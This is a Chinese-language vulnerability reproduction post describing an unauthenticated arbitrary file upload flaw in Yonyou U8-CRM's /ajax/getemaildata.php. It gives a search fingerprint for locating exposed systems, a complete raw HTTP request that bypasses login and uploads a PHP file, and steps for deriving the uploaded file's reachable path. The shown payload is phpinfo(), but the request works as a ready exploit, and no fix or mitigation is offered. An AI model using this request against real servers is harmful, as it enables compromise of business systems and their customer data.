登录 白背景

用友U8-CRM getemaildata.php任意文件上传漏洞

一、漏洞简介

用友U8-CRM是企业利用信息技术,是一项商业策略,它通过依据市场细分组织企业资源、培养以客户为中心的经营行为、执行以客户为中心的业务流程等手段来优化企业的客户满意度和获利能力。用友U8-CRM客户关系管理系统存在任意文件上传漏洞,攻击者利用该漏洞可以上传任意文件,导致服务器被沦陷等。

二、影响版本

  • 用友U8-CRM

三、资产测绘

  • app.name="用友 CRM"
  • 登录页面

image.png
四、漏洞复现

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 135
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.php "

<?php phpinfo();?>
--00content0boundary00--

image.png
说明:

  • 上传之后返回的路径为:D:\U8SOFT\turbocrm70\code\www\tmpfile\mht2AC0.tmp.mht直接访问这个文件不解析,需要访问另一个文件 。

image.png

  • 修改mhtupd,77ED需要减1为77EC,,拼接后上传文件为:
/tmpfile/upd77EC.tmp.php

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/owne5sb6af1am2lf